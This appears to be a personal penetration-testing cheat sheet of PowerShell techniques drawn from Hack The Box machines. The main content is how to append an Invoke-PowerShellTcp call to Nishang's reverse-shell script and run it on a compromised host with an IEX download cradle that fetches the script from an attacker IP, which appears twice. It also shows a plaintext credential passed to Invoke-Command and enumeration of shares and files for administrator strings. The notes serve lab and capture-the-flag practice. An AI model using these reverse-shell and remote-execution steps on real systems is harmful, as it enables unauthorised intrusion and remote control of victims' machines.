Nishang
If we want to add a .ps1 file into a Windows machine such as the Nishang series we can modify the latest line of such file (to load the script and then execute it):
1
2
3
4
5
6
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 1234
Then we can execute it by using the following command on the compromised machine:
1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.4/Invoke-PowerShellTcp.ps1')
Examples: [[Anubis#^bcdb9e]]
Invoke-Command
Module to execute commands on the specified machine:
1
2
3
PS> $Password = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
PS> $Creds = New-Object System.Management.Automation.PSCredential('timelapse.htb\svc_deploy', $Password)
*PS> Invoke-Command -ComputerName dc01 -Credential $Creds -ScriptBlock { whoami }
Examples: Fulcrum
Get-SMBShare
Retrieves the local shares:
1
2
3
4
5
6
7
PS C:\Users\BTables\Desktop> Get-SMBShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * Remote Admin
C$ * Default share
IPC$ * Remote IPC
Examples: Fulcrum
Select-String (Search String Pattern)
Search files on the system
1
2
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern Administrator
PS X:\fulcrum.local\scripts> Select-String -Path "X:\fulcrum.local\scripts\*.ps1" -Pattern 923a
Example: Fulcrum
AD CS
TODO [[Anubis]]
Invoke-PowerShellTCP
In order to connect to get a reverse shell with powershell we can abuse of the Invoke-PowerShellTCP.ps1 all we need to do is modify the very bottom of this .ps1 file as follows:
1
2
3
4
5
6
7
8
9
10
# Invoke-PowerShellTCP.ps1
------------------------SNIP---------------------------
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 443 -Rows 37 -Cols 189
To get the file in rows and columns of the screen we can execute the stty size on our attacker machine.
Then from the shell we get, we only need need to execute the followin powershell command:
1
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1')"
Don’t forget to open your listener with netcat locally.
Examples: Streamio [[Anubis]]